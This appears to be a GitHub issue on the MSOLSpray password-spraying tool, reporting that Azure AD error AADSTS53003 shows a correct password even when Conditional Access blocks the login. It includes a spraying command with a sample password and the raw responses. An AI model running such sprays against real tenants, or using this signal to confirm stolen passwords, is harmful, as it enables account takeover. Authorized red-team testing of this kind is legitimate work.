
Add additional code indicating Password was fine, but Conditional Access Policy thwarted attempt #5

Open
mgeeky opened this issue Feb 11, 2022 · 0 comments


mgeeky commented Feb 11, 2022

Hi,

During our tests we've found that when a sprayed user has a correct password but the attempt fails due to Conditional Access Policy requirements, the following error code will be thrown:

PS C:\MSOLSpray > Invoke-MSOLSpray -UserList users.txt -password Winter2022 -verbose
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 02/11/2022 14:06:36
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
[*] Got an error we haven't seen yet for user john.doe@contoso.com
{"error":"interaction_required","error_description":"AADSTS53003: Access has been blocked by Conditional Access policies. The access policy does not allow token issuance.\r\nTrace ID: e0ea6353-40e5-4496-8bd5-294facea2e00\r\nCorrelation ID: 2ba27739-7daf-49e7-949c-2e16e3c42079\r\nTimestamp: 2022-02-11 13:06:36Z","error_codes":[53003],"timestamp":"2022-02-11 13:06:36Z","trace_id":"e0ea6353-40e5-4496-8bd5-294facea2e00","correlation_id":"2ba27739-7daf-49e7-949c-2e16e3c42079","error_uri":"https://login.microsoft.com/error?code=53003","suberror":"message_only"}

Whereas the same attempt with a wrong password will result in no output:

PS C:\MSOLSpray > Invoke-MSOLSpray -UserList users.txt -password Winter20www22 -verbose
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 02/11/2022 14:06:51
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload

The conclusion is that the AADSTS53003 error code indicates a correct password, but with CAP getting in the way.
I guess it's worth adding corresponding logic to handle that :)

Regards,
Mariusz.
